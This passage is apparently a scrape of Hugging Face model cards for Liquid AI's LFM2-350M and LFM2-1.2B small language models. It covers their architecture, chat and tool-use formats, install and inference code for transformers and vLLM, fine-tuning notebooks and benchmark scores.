<path d="M29.6439 28.4615C27.9259 28.4615 26.4131 28.1282 25.1054 27.4615C23.8233 26.7692 22.8362 25.8077 22.1439 24.5769C21.4516 23.3462 21.1054 21.9103 21.1054 20.2692V14.7308C21.1054 13.0641 21.4516 11.6282 22.1439 10.4231C22.8362 9.19231 23.8233 8.24359 25.1054 7.57692C26.4131 6.88462 27.9259 6.53846 29.6439 6.53846C31.3875 6.53846 32.9003 6.88462 34.1823 7.57692C35.4644 8.24359 36.4516 9.19231 37.1439 10.4231C37.8362 11.6282 38.1823 13.0641 38.1823 14.7308V18.5H25.1054V20.2692C25.1054 21.8333 25.49 23.0256 26.2592 23.8462C27.0541 24.6667 28.1951 25.0769 29.6823 25.0769C30.8875 25.0769 31.8618 24.8718 32.6054 24.4615C33.349 24.0256 33.8105 23.3974 33.99 22.5769H38.1054C37.7977 24.3718 36.8746 25.8077 35.3362 26.8846C33.7977 27.9359 31.9003 28.4615 29.6439 28.4615ZM34.1823 16V14.6923C34.1823 13.1538 33.7977 11.9615 33.0285 11.1154C32.2592 10.2692 31.131 9.84615 29.6439 9.84615C28.1823 9.84615 27.0541 10.2692 26.2592 11.1154C25.49 11.9615 25.1054 13.1667 25.1054 14.7308V15.6923L34.49 15.6538L34.1823 16Z"/>
<path d="M46.3596 28.4615C44.1545 28.4615 42.4109 27.8974 41.1288 26.7692C39.8724 25.6154 39.2442 24.0513 39.2442 22.0769C39.2442 20.0769 39.9109 18.5128 41.2442 17.3846C42.6032 16.2308 44.4622 15.6538 46.8211 15.6538H52.7058V13.6923C52.7058 12.5385 52.3468 11.641 51.6288 11C50.9109 10.359 49.8981 10.0385 48.5904 10.0385C47.4365 10.0385 46.475 10.2949 45.7058 10.8077C44.9365 11.2949 44.4878 11.9487 44.3596 12.7692H40.2827C40.5135 10.8718 41.3852 9.35897 42.8981 8.23077C44.4365 7.10256 46.3724 6.53846 48.7058 6.53846C51.2186 6.53846 53.2058 7.17949 54.6673 8.46154C56.1288 9.71795 56.8596 11.4359 56.8596 13.6154V28.0769H52.8211V24.1923H52.1288L52.8211 23.4231C52.8211 24.9615 52.2314 26.1923 51.0519 27.1154C49.8724 28.0128 48.3083 28.4615 46.3596 28.4615ZM47.5904 25.2692C49.0776 25.2692 50.2955 24.8974 51.2442 24.1538C52.2186 23.3846 52.7058 22.4103 52.7058 21.2308V18.4615H46.8981C45.8211 18.4615 44.9622 18.7564 44.3211 19.3462C43.7058 19.9359 43.3981 20.7436 43.3981 21.7692C43.3981 22.8462 43.7699 23.7051 44.5135 24.3462C45.257 24.9615 46.2827 25.2692 47.5904 25.2692Z"/>
<path d="M58.9984 35V6.92308H63.1138V10.9615H63.9984L63.1138 11.9231C63.1138 10.2564 63.6266 8.94872 64.6523 8C65.7036 7.02564 67.101 6.53846 68.8446 6.53846C70.9728 6.53846 72.6651 7.25641 73.9215 8.69231C75.2036 10.1026 75.8446 12.0385 75.8446 14.5V20.4615C75.8446 22.1026 75.5497 23.5256 74.96 24.7308C74.3959 25.9103 73.5882 26.8333 72.5369 27.5C71.5113 28.141 70.2805 28.4615 68.8446 28.4615C67.1266 28.4615 65.742 27.9872 64.6907 27.0385C63.6395 26.0641 63.1138 24.7436 63.1138 23.0769L63.9984 24.0385H63.0369L63.1523 28.9615V35H58.9984ZM67.4215 24.8462C68.7805 24.8462 69.8318 24.4615 70.5754 23.6923C71.3446 22.8974 71.7292 21.7564 71.7292 20.2692V14.7308C71.7292 13.2436 71.3446 12.1154 70.5754 11.3462C69.8318 10.5513 68.7805 10.1538 67.4215 10.1538C66.1138 10.1538 65.0754 10.5641 64.3061 11.3846C63.5369 12.1795 63.1523 13.2949 63.1523 14.7308V20.2692C63.1523 21.7051 63.5369 22.8333 64.3061 23.6538C65.0754 24.4487 66.1138 24.8462 67.4215 24.8462Z"/>
</g>
<linearGradient id="y" x1="0%" y1="0%" x2="100%" y2="0%">
<stop offset="0%" style="stop-color:#000000"></stop>
</linearGradient>
</svg>
</a>
</div>
</center>
# LFM2-350M
LFM2 is a new generation of hybrid models developed by [Liquid AI](https://www.liquid.ai/), specifically designed for edge AI and on-device deployment. It sets a new standard in terms of quality, speed, and memory efficiency.
We're releasing the weights of four post-trained checkpoints with 350M, 700M, 1.2B, and 2.6 parameters. They provide the following key features to create AI-powered edge applications:
* **Fast training & inference** – LFM2 achieves 3x faster training compared to its previous generation. It also benefits from 2x faster decode and prefill speed on CPU compared to Qwen3.
* **Best performance** – LFM2 outperforms similarly-sized models across multiple benchmark categories, including knowledge, mathematics, instruction following, and multilingual capabilities.
* **New architecture** – LFM2 is a new hybrid Liquid model with multiplicative gates and short convolutions.
* **Flexible deployment** – LFM2 runs efficiently on CPU, GPU, and NPU hardware for flexible deployment on smartphones, laptops, or vehicles.
Find more information about LFM2 in our [blog post](https://www.liquid.ai/blog/liquid-foundation-models-v2-our-second-series-of-generative-ai-models).
## 📄 Model details
Due to their small size, **we recommend fine-tuning LFM2 models on narrow use cases** to maximize performance.
They are particularly suited for agentic tasks, data extraction, RAG, creative writing, and multi-turn conversations.
However, we do not recommend using them for tasks that are knowledge-intensive or require programming skills.
| Property | [**LFM2-350M**](https://huggingface.co/LiquidAI/LFM2-350M) | [**LFM2-700M**](https://huggingface.co/LiquidAI/LFM2-700M) | [**LFM2-1.2B**](https://huggingface.co/LiquidAI/LFM2-1.2B) | [**LFM2-2.6B**](https://huggingface.co/LiquidAI/LFM2-2.6B) |
| ------------------- | ----------------------------- | ----------------------------- | ----------------------------- | ----------------------------- |
| **Parameters** | 354,483,968 | 742,489,344 | 1,170,340,608 | 2,569,272,320 |
| **Layers** | 16 (10 conv + 6 attn) | 16 (10 conv + 6 attn) | 16 (10 conv + 6 attn) | 30 (22 conv + 8 attn) |
| **Context length** | 32,768 tokens | 32,768 tokens | 32,768 tokens | 32,768 tokens |
| **Vocabulary size** | 65,536 | 65,536 | 65,536 | 65,536 |
| **Precision** | bfloat16 | bfloat16 | bfloat16 | bfloat16 |
| **Training budget** | 10 trillion tokens | 10 trillion tokens | 10 trillion tokens | 10 trillion tokens |
| **License** | LFM Open License v1.0 | LFM Open License v1.0 | LFM Open License v1.0 | LFM Open License v1.0 |
**Supported languages**: English, Arabic, Chinese, French, German, Japanese, Korean, and Spanish.
**Generation parameters**: We recommend the following parameters:
* `temperature=0.3`
* `min_p=0.15`
* `repetition_penalty=1.05`
**Chat template**: LFM2 uses a ChatML-like chat template as follows:
```
<|startoftext|><|im_start|>system
You are a helpful assistant trained by Liquid AI.<|im_end|>
<|im_start|>user
What is C. elegans?<|im_end|>
<|im_start|>assistant
It's a tiny nematode that lives in temperate soil environments.<|im_end|>
```
You can automatically apply it using the dedicated [`.apply_chat_template()`](https://huggingface.co/docs/transformers/en/chat_templating#applychattemplate) function from Hugging Face transformers.
**Tool use**: It consists of four main steps:
1. **Function definition**: LFM2 takes JSON function definitions as input (JSON objects between `<|tool_list_start|>` and `<|tool_list_end|>` special tokens), usually in the system prompt
2. **Function call**: LFM2 writes Pythonic function calls (a Python list between `<|tool_call_start|>` and `<|tool_call_end|>` special tokens), as the assistant answer.
3. **Function execution**: The function call is executed and the result is returned (string between `<|tool_response_start|>` and `<|tool_response_end|>` special tokens), as a "tool" role.
4. **Final answer**: LFM2 interprets the outcome of the function call to address the original user prompt in plain text.
Here is a simple example of a conversation using tool use:
```
<|startoftext|><|im_start|>system
List of tools: <|tool_list_start|>[{"name": "get_candidate_status", "description": "Retrieves the current status of a candidate in the recruitment process", "parameters": {"type": "object", "properties": {"candidate_id": {"type": "string", "description": "Unique identifier for the candidate"}}, "required": ["candidate_id"]}}]<|tool_list_end|><|im_end|>
<|im_start|>user
What is the current status of candidate ID 12345?<|im_end|>
<|im_start|>assistant
<|tool_call_start|>[get_candidate_status(candidate_id="12345")]<|tool_call_end|>Checking the current status of candidate ID 12345.<|im_end|>
<|im_start|>tool
<|tool_response_start|>{"candidate_id": "12345", "status": "Interview Scheduled", "position": "Clinical Research Associate", "date": "2023-11-20"}<|tool_response_end|><|im_end|>
<|im_start|>assistant
The candidate with ID 12345 is currently in the "Interview Scheduled" stage for the position of Clinical Research Associate, with an interview date set for 2023-11-20.<|im_end|>
```
**Architecture**: Hybrid model with multiplicative gates and short convolutions: 10 double-gated short-range LIV convolution blocks and 6 grouped query attention (GQA) blocks.
**Pre-training mixture**: Approximately 75% English, 20% multilingual, and 5% code data sourced from the web and licensed materials.
**Training approach**:
* Knowledge distillation using [LFM1-7B](https://www.liquid.ai/blog/introducing-lfm-7b-setting-new-standards-for-efficient-language-models) as teacher model
* Very large-scale SFT on 50% downstream tasks, 50% general domains
* Custom DPO with length normalization and semi-online datasets
* Iterative model merging
## 🏃 How to run LFM2
### 1. Transformers
To run LFM2, you need to install Hugging Face [`transformers`](https://github.com/huggingface/transformers) v4.55 or a more recent version as follows:
```bash
pip install -U transformers
```
Here is an example of how to generate an answer with transformers in Python:
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
# Load model and tokenizer
model_id = "LiquidAI/LFM2-350M"
model = AutoModelForCausalLM.from_pretrained(
model_id,
device_map="auto",
torch_dtype="bfloat16",
# attn_implementation="flash_attention_2" <- uncomment on compatible GPU
)
tokenizer = AutoTokenizer.from_pretrained(model_id)
# Generate answer
prompt = "What is C. elegans?"
input_ids = tokenizer.apply_chat_template(
[{"role": "user", "content": prompt}],
add_generation_prompt=True,
return_tensors="pt",
tokenize=True,
).to(model.device)
output = model.generate(
input_ids,
do_sample=True,
temperature=0.3,
min_p=0.15,
repetition_penalty=1.05,
max_new_tokens=512,
)
print(tokenizer.decode(output[0], skip_special_tokens=False))
# <|startoftext|><|im_start|>user
# What is C. elegans?<|im_end|>
# <|im_start|>assistant
# C. elegans, also known as Caenorhabditis elegans, is a small, free-living
# nematode worm (roundworm) that belongs to the phylum Nematoda.
```
You can directly run and test the model with this [Colab notebook](https://colab.research.google.com/drive/1_q3jQ6LtyiuPzFZv7Vw8xSfPU5FwkKZY?usp=sharing).
### 2. vLLM
You need to install [`vLLM`](https://github.com/vllm-project/vllm) v0.10.2 or a more recent version as follows:
```bash
uv pip install vllm==0.10.2 --extra-index-url https://wheels.vllm.ai/0.10.2/ --torch-backend=auto
```
Here is an example of how to use it for inference:
```python
from vllm import LLM, SamplingParams
prompts = [
"What is C. elegans?",
"Say hi in JSON format",
"Define AI in Spanish"
]
sampling_params = SamplingParams(
temperature=0.3,
min_p=0.15,
repetition_penalty=1.05
)
llm = LLM(model="LiquidAI/LFM2-350M")
outputs = llm.generate(prompts, sampling_params)
for output in outputs:
prompt = output.prompt
generated_text = output.outputs[0].text
print(f"Prompt: {prompt!r}, Generated text: {generated_text!r}")
```
### 3. llama.cpp
You can run LFM2 with llama.cpp using its [GGUF checkpoint](https://huggingface.co/LiquidAI/LFM2-350M-GGUF). Find more information in the model card.
## 🔧 How to fine-tune LFM2
We recommend fine-tuning LFM2 models on your use cases to maximize performance.
| Notebook | Description | Link |
|-------|------|------|
| SFT (Unsloth) | Supervised Fine-Tuning (SFT) notebook with a LoRA adapter using Unsloth. | <a href="https://colab.research.google.com/drive/1HROdGaPFt1tATniBcos11-doVaH7kOI3?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
| SFT (Axolotl) | Supervised Fine-Tuning (SFT) notebook with a LoRA adapter using Axolotl. | <a href="https://colab.research.google.com/drive/155lr5-uYsOJmZfO6_QZPjbs8hA_v8S7t?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
| SFT (TRL) | Supervised Fine-Tuning (SFT) notebook with a LoRA adapter using TRL. | <a href="https://colab.research.google.com/drive/1j5Hk_SyBb2soUsuhU0eIEA9GwLNRnElF?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
| DPO (TRL) | Preference alignment with Direct Preference Optimization (DPO) using TRL. | <a href="https://colab.research.google.com/drive/1MQdsPxFHeZweGsNx4RH7Ia8lG8PiGE1t?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
## 📈 Performance
LFM2 outperforms similar-sized models across different evaluation categories.
### 1. Automated benchmarks

| Model | MMLU | GPQA | IFEval | IFBench | GSM8K | MGSM | MMMLU |
|-------|------|------|--------|---------|-------|------|-------|
| LFM2-350M | 43.43 | 27.46 | 65.12 | 16.41 | 30.1 | 29.52 | 37.99 |
| LFM2-700M | 49.9 | 28.48 | 72.23 | 20.56 | 46.4 | 45.36 | 43.28 |
| LFM2-1.2B | *55.23* | **31.47** | **74.89** | *20.7* | *58.3* | *55.04* | **46.73** |
| Qwen3-0.6B | 44.93 | 22.14 | 64.24 | 19.75 | 36.47 | 41.28 | 30.84 |
| Qwen3-1.7B | **59.11** | 27.72 | *73.98* | **21.27** | 51.4 | **66.56** | *46.51* |
| Llama-3.2-1B-Instruct | 46.6 | *28.84* | 52.39 | 16.86 | 35.71 | 29.12 | 38.15 |
| gemma-3-1b-it | 40.08 | 21.07 | 62.9 | 17.72 | **59.59** | 43.6 | 34.43 |
### 2. LLM-as-a-Judge


### 3. Inference
#### Throughput comparison on CPU in ExecuTorch

#### Throughput comparison on CPU in Llama.cpp

## 📬 Contact
If you are interested in custom solutions with edge deployment, please contact [our sales team](https://www.liquid.ai/contact).
|
LiquidAI/LFM2-1.2B
|
LiquidAI
| 2025-09-23T14:49:12Z | 31,961 | 294 |
transformers
|
[
"transformers",
"safetensors",
"lfm2",
"text-generation",
"liquid",
"edge",
"conversational",
"en",
"ar",
"zh",
"fr",
"de",
"ja",
"ko",
"es",
"license:other",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-07-10T12:01:50Z |
---
library_name: transformers
license: other
license_name: lfm1.0
license_link: LICENSE
language:
- en
- ar
- zh
- fr
- de
- ja
- ko
- es
pipeline_tag: text-generation
tags:
- liquid
- lfm2
- edge
---
<center>
<div style="text-align: center;">
<img
src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/7_6D7rWrLxp2hb6OHSV1p.png"
alt="Liquid AI"
style="width: 100%; max-width: 66%; height: auto; display: inline-block; margin-bottom: 0.5em; margin-top: 0.5em;"
/>
</div>
<div style="display: flex; justify-content: center;">
<a href="https://playground.liquid.ai/chat">
<svg width="114.8" height="20" viewBox="0 0 900 200" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Playground" style="margin-bottom: 1em;">
<title>Playground</title>
<g>
<rect fill="#fff" width="200" height="200"></rect>
<rect fill="url(#x)" x="200" width="800" height="200"></rect>
</g>
<g transform="translate(35, 30) scale(0.45, 0.45)">
<path d="M172.314 129.313L172.219 129.367L206.125 188.18C210.671 195.154 213.324 203.457 213.324 212.382C213.324 220.834 210.956 228.739 206.839 235.479L275.924 213.178L167.853 33.6L141.827 76.9614L172.314 129.313Z" fill="black"/>
<path d="M114.217 302.4L168.492 257.003C168.447 257.003 168.397 257.003 168.352 257.003C143.515 257.003 123.385 237.027 123.385 212.387C123.385 203.487 126.023 195.204 130.55 188.24L162.621 132.503L135.966 86.7327L60.0762 213.183L114.127 302.4H114.217Z" fill="black"/>
<path d="M191.435 250.681C191.435 250.681 191.43 250.681 191.425 250.686L129.71 302.4H221.294L267.71 226.593L191.435 250.686V250.681Z" fill="black"/>
</g>
<g transform="translate(50, 0)" aria-hidden="true" fill="#fff" text-anchor="start" font-family="Verdana,DejaVu Sans,sans-serif" font-size="110">
<text x="255" y="148" textLength="619" fill="#000" opacity="0.1">Playground</text>
<text x="245" y="138" textLength="619">Playground</text>
</g>
<linearGradient id="x" x1="0%" y1="0%" x2="100%" y2="0%">
<stop offset="0%" style="stop-color:#000000"></stop>
<stop offset="100%" style="stop-color:#000000"></stop>
</linearGradient>
</svg>
</a>
<a href="https://leap.liquid.ai/?utm_source=huggingface&utm_medium=modelcards">
<svg width="114.8" height="20" viewBox="0 0 900 200" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Leap" style="margin-bottom: 1em;">
<title>Leap</title>
<g>
<rect fill="#000" width="500" height="200"></rect>
</g>
<g transform="translate(100, 45) scale(3.5, 3.5)" fill="#fff">
<path d="M13.8512 28.0769C12.5435 28.0769 11.4025 27.8205 10.4281 27.3077C9.45375 26.7692 8.68452 26.0128 8.12042 25.0385C7.58196 24.0641 7.31273 22.9359 7.31273 21.6538V3.76923H0.389648V0H11.4666V21.6538C11.4666 22.4744 11.6973 23.1282 12.1589 23.6154C12.6204 24.0769 13.2486 24.3077 14.0435 24.3077H20.582V28.0769H13.8512Z"/>
<path d="M29.6439 28.4615C27.9259 28.4615 26.4131 28.1282 25.1054 27.4615C23.8233 26.7692 22.8362 25.8077 22.1439 24.5769C21.4516 23.3462 21.1054 21.9103 21.1054 20.2692V14.7308C21.1054 13.0641 21.4516 11.6282 22.1439 10.4231C22.8362 9.19231 23.8233 8.24359 25.1054 7.57692C26.4131 6.88462 27.9259 6.53846 29.6439 6.53846C31.3875 6.53846 32.9003 6.88462 34.1823 7.57692C35.4644 8.24359 36.4516 9.19231 37.1439 10.4231C37.8362 11.6282 38.1823 13.0641 38.1823 14.7308V18.5H25.1054V20.2692C25.1054 21.8333 25.49 23.0256 26.2592 23.8462C27.0541 24.6667 28.1951 25.0769 29.6823 25.0769C30.8875 25.0769 31.8618 24.8718 32.6054 24.4615C33.349 24.0256 33.8105 23.3974 33.99 22.5769H38.1054C37.7977 24.3718 36.8746 25.8077 35.3362 26.8846C33.7977 27.9359 31.9003 28.4615 29.6439 28.4615ZM34.1823 16V14.6923C34.1823 13.1538 33.7977 11.9615 33.0285 11.1154C32.2592 10.2692 31.131 9.84615 29.6439 9.84615C28.1823 9.84615 27.0541 10.2692 26.2592 11.1154C25.49 11.9615 25.1054 13.1667 25.1054 14.7308V15.6923L34.49 15.6538L34.1823 16Z"/>
<path d="M46.3596 28.4615C44.1545 28.4615 42.4109 27.8974 41.1288 26.7692C39.8724 25.6154 39.2442 24.0513 39.2442 22.0769C39.2442 20.0769 39.9109 18.5128 41.2442 17.3846C42.6032 16.2308 44.4622 15.6538 46.8211 15.6538H52.7058V13.6923C52.7058 12.5385 52.3468 11.641 51.6288 11C50.9109 10.359 49.8981 10.0385 48.5904 10.0385C47.4365 10.0385 46.475 10.2949 45.7058 10.8077C44.9365 11.2949 44.4878 11.9487 44.3596 12.7692H40.2827C40.5135 10.8718 41.3852 9.35897 42.8981 8.23077C44.4365 7.10256 46.3724 6.53846 48.7058 6.53846C51.2186 6.53846 53.2058 7.17949 54.6673 8.46154C56.1288 9.71795 56.8596 11.4359 56.8596 13.6154V28.0769H52.8211V24.1923H52.1288L52.8211 23.4231C52.8211 24.9615 52.2314 26.1923 51.0519 27.1154C49.8724 28.0128 48.3083 28.4615 46.3596 28.4615ZM47.5904 25.2692C49.0776 25.2692 50.2955 24.8974 51.2442 24.1538C52.2186 23.3846 52.7058 22.4103 52.7058 21.2308V18.4615H46.8981C45.8211 18.4615 44.9622 18.7564 44.3211 19.3462C43.7058 19.9359 43.3981 20.7436 43.3981 21.7692C43.3981 22.8462 43.7699 23.7051 44.5135 24.3462C45.257 24.9615 46.2827 25.2692 47.5904 25.2692Z"/>
<path d="M58.9984 35V6.92308H63.1138V10.9615H63.9984L63.1138 11.9231C63.1138 10.2564 63.6266 8.94872 64.6523 8C65.7036 7.02564 67.101 6.53846 68.8446 6.53846C70.9728 6.53846 72.6651 7.25641 73.9215 8.69231C75.2036 10.1026 75.8446 12.0385 75.8446 14.5V20.4615C75.8446 22.1026 75.5497 23.5256 74.96 24.7308C74.3959 25.9103 73.5882 26.8333 72.5369 27.5C71.5113 28.141 70.2805 28.4615 68.8446 28.4615C67.1266 28.4615 65.742 27.9872 64.6907 27.0385C63.6395 26.0641 63.1138 24.7436 63.1138 23.0769L63.9984 24.0385H63.0369L63.1523 28.9615V35H58.9984ZM67.4215 24.8462C68.7805 24.8462 69.8318 24.4615 70.5754 23.6923C71.3446 22.8974 71.7292 21.7564 71.7292 20.2692V14.7308C71.7292 13.2436 71.3446 12.1154 70.5754 11.3462C69.8318 10.5513 68.7805 10.1538 67.4215 10.1538C66.1138 10.1538 65.0754 10.5641 64.3061 11.3846C63.5369 12.1795 63.1523 13.2949 63.1523 14.7308V20.2692C63.1523 21.7051 63.5369 22.8333 64.3061 23.6538C65.0754 24.4487 66.1138 24.8462 67.4215 24.8462Z"/>
</g>
<linearGradient id="y" x1="0%" y1="0%" x2="100%" y2="0%">
<stop offset="0%" style="stop-color:#000000"></stop>
</linearGradient>
</svg>
</a>
</div>
</center>
# LFM2-1.2B
LFM2 is a new generation of hybrid models developed by [Liquid AI](https://www.liquid.ai/), specifically designed for edge AI and on-device deployment. It sets a new standard in terms of quality, speed, and memory efficiency.
We're releasing the weights of four post-trained checkpoints with 350M, 700M, 1.2B, and 2.6 parameters. They provide the following key features to create AI-powered edge applications:
* **Fast training & inference** – LFM2 achieves 3x faster training compared to its previous generation. It also benefits from 2x faster decode and prefill speed on CPU compared to Qwen3.
* **Best performance** – LFM2 outperforms similarly-sized models across multiple benchmark categories, including knowledge, mathematics, instruction following, and multilingual capabilities.
* **New architecture** – LFM2 is a new hybrid Liquid model with multiplicative gates and short convolutions.
* **Flexible deployment** – LFM2 runs efficiently on CPU, GPU, and NPU hardware for flexible deployment on smartphones, laptops, or vehicles.
Find more information about LFM2 in our [blog post](https://www.liquid.ai/blog/liquid-foundation-models-v2-our-second-series-of-generative-ai-models).
## 📄 Model details
Due to their small size, **we recommend fine-tuning LFM2 models on narrow use cases** to maximize performance.
They are particularly suited for agentic tasks, data extraction, RAG, creative writing, and multi-turn conversations.
However, we do not recommend using them for tasks that are knowledge-intensive or require programming skills.
| Property | [**LFM2-350M**](https://huggingface.co/LiquidAI/LFM2-350M) | [**LFM2-700M**](https://huggingface.co/LiquidAI/LFM2-700M) | [**LFM2-1.2B**](https://huggingface.co/LiquidAI/LFM2-1.2B) | [**LFM2-2.6B**](https://huggingface.co/LiquidAI/LFM2-2.6B) |
| ------------------- | ----------------------------- | ----------------------------- | ----------------------------- | ----------------------------- |
| **Parameters** | 354,483,968 | 742,489,344 | 1,170,340,608 | 2,569,272,320 |
| **Layers** | 16 (10 conv + 6 attn) | 16 (10 conv + 6 attn) | 16 (10 conv + 6 attn) | 30 (22 conv + 8 attn) |
| **Context length** | 32,768 tokens | 32,768 tokens | 32,768 tokens | 32,768 tokens |
| **Vocabulary size** | 65,536 | 65,536 | 65,536 | 65,536 |
| **Precision** | bfloat16 | bfloat16 | bfloat16 | bfloat16 |
| **Training budget** | 10 trillion tokens | 10 trillion tokens | 10 trillion tokens | 10 trillion tokens |
| **License** | LFM Open License v1.0 | LFM Open License v1.0 | LFM Open License v1.0 | LFM Open License v1.0 |
**Supported languages**: English, Arabic, Chinese, French, German, Japanese, Korean, and Spanish.
**Generation parameters**: We recommend the following parameters:
* `temperature=0.3`
* `min_p=0.15`
* `repetition_penalty=1.05`
**Chat template**: LFM2 uses a ChatML-like chat template as follows:
```
<|startoftext|><|im_start|>system
You are a helpful assistant trained by Liquid AI.<|im_end|>
<|im_start|>user
What is C. elegans?<|im_end|>
<|im_start|>assistant
It's a tiny nematode that lives in temperate soil environments.<|im_end|>
```
You can automatically apply it using the dedicated [`.apply_chat_template()`](https://huggingface.co/docs/transformers/en/chat_templating#applychattemplate) function from Hugging Face transformers.
**Tool use**: It consists of four main steps:
1. **Function definition**: LFM2 takes JSON function definitions as input (JSON objects between `<|tool_list_start|>` and `<|tool_list_end|>` special tokens), usually in the system prompt
2. **Function call**: LFM2 writes Pythonic function calls (a Python list between `<|tool_call_start|>` and `<|tool_call_end|>` special tokens), as the assistant answer.
3. **Function execution**: The function call is executed and the result is returned (string between `<|tool_response_start|>` and `<|tool_response_end|>` special tokens), as a "tool" role.
4. **Final answer**: LFM2 interprets the outcome of the function call to address the original user prompt in plain text.
Here is a simple example of a conversation using tool use:
```
<|startoftext|><|im_start|>system
List of tools: <|tool_list_start|>[{"name": "get_candidate_status", "description": "Retrieves the current status of a candidate in the recruitment process", "parameters": {"type": "object", "properties": {"candidate_id": {"type": "string", "description": "Unique identifier for the candidate"}}, "required": ["candidate_id"]}}]<|tool_list_end|><|im_end|>
<|im_start|>user
What is the current status of candidate ID 12345?<|im_end|>
<|im_start|>assistant
<|tool_call_start|>[get_candidate_status(candidate_id="12345")]<|tool_call_end|>Checking the current status of candidate ID 12345.<|im_end|>
<|im_start|>tool
<|tool_response_start|>{"candidate_id": "12345", "status": "Interview Scheduled", "position": "Clinical Research Associate", "date": "2023-11-20"}<|tool_response_end|><|im_end|>
<|im_start|>assistant
The candidate with ID 12345 is currently in the "Interview Scheduled" stage for the position of Clinical Research Associate, with an interview date set for 2023-11-20.<|im_end|>
```
**Architecture**: Hybrid model with multiplicative gates and short convolutions: 10 double-gated short-range LIV convolution blocks and 6 grouped query attention (GQA) blocks.
**Pre-training mixture**: Approximately 75% English, 20% multilingual, and 5% code data sourced from the web and licensed materials.
**Training approach**:
* Knowledge distillation using [LFM1-7B](https://www.liquid.ai/blog/introducing-lfm-7b-setting-new-standards-for-efficient-language-models) as teacher model
* Very large-scale SFT on 50% downstream tasks, 50% general domains
* Custom DPO with length normalization and semi-online datasets
* Iterative model merging
## 🏃 How to run LFM2
### 1. Transformers
To run LFM2, you need to install Hugging Face [`transformers`](https://github.com/huggingface/transformers) v4.55 or a more recent version as follows:
```bash
pip install -U transformers
```
Here is an example of how to generate an answer with transformers in Python:
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
# Load model and tokenizer
model_id = "LiquidAI/LFM2-1.2B"
model = AutoModelForCausalLM.from_pretrained(
model_id,
device_map="auto",
torch_dtype="bfloat16",
# attn_implementation="flash_attention_2" <- uncomment on compatible GPU
)
tokenizer = AutoTokenizer.from_pretrained(model_id)
# Generate answer
prompt = "What is C. elegans?"
input_ids = tokenizer.apply_chat_template(
[{"role": "user", "content": prompt}],
add_generation_prompt=True,
return_tensors="pt",
tokenize=True,
).to(model.device)
output = model.generate(
input_ids,
do_sample=True,
temperature=0.3,
min_p=0.15,
repetition_penalty=1.05,
max_new_tokens=512,
)
print(tokenizer.decode(output[0], skip_special_tokens=False))
# <|startoftext|><|im_start|>user
# What is C. elegans?<|im_end|>
# <|im_start|>assistant
# C. elegans, also known as Caenorhabditis elegans, is a small, free-living
# nematode worm (roundworm) that belongs to the phylum Nematoda.
```
You can directly run and test the model with this [Colab notebook](https://colab.research.google.com/drive/1_q3jQ6LtyiuPzFZv7Vw8xSfPU5FwkKZY?usp=sharing).
### 2. vLLM
You need to install [`vLLM`](https://github.com/vllm-project/vllm) v0.10.2 or a more recent version as follows:
```bash
uv pip install vllm==0.10.2 --extra-index-url https://wheels.vllm.ai/0.10.2/ --torch-backend=auto
```
Here is an example of how to use it for inference:
```python
from vllm import LLM, SamplingParams
prompts = [
"What is C. elegans?",
"Say hi in JSON format",
"Define AI in Spanish"
]
sampling_params = SamplingParams(
temperature=0.3,
min_p=0.15,
repetition_penalty=1.05
)
llm = LLM(model="LiquidAI/LFM2-1.2B")
outputs = llm.generate(prompts, sampling_params)
for output in outputs:
prompt = output.prompt
generated_text = output.outputs[0].text
print(f"Prompt: {prompt!r}, Generated text: {generated_text!r}")
```
### 3. llama.cpp
You can run LFM2 with llama.cpp using its [GGUF checkpoint](https://huggingface.co/LiquidAI/LFM2-1.2B-GGUF). Find more information in the model card.
## 🔧 How to fine-tune LFM2
We recommend fine-tuning LFM2 models on your use cases to maximize performance.
| Notebook | Description | Link |
|-------|------|------|
| SFT (Unsloth) | Supervised Fine-Tuning (SFT) notebook with a LoRA adapter using Unsloth. | <a href="https://colab.research.google.com/drive/1HROdGaPFt1tATniBcos11-doVaH7kOI3?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
| SFT (Axolotl) | Supervised Fine-Tuning (SFT) notebook with a LoRA adapter using Axolotl. | <a href="https://colab.research.google.com/drive/155lr5-uYsOJmZfO6_QZPjbs8hA_v8S7t?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
| SFT (TRL) | Supervised Fine-Tuning (SFT) notebook with a LoRA adapter using TRL. | <a href="https://colab.research.google.com/drive/1j5Hk_SyBb2soUsuhU0eIEA9GwLNRnElF?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
| DPO (TRL) | Preference alignment with Direct Preference Optimization (DPO) using TRL. | <a href="https://colab.research.google.com/drive/1MQdsPxFHeZweGsNx4RH7Ia8lG8PiGE1t?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
## 📈 Performance
LFM2 outperforms similar-sized models across different evaluation categories.
### 1. Automated benchmarks

| Model | MMLU | GPQA | IFEval | IFBench | GSM8K | MGSM | MMMLU |
|-------|------|------|--------|---------|-------|------|-------|
| LFM2-350M | 43.43 | 27.46 | 65.12 | 16.41 | 30.1 | 29.52 | 37.99 |
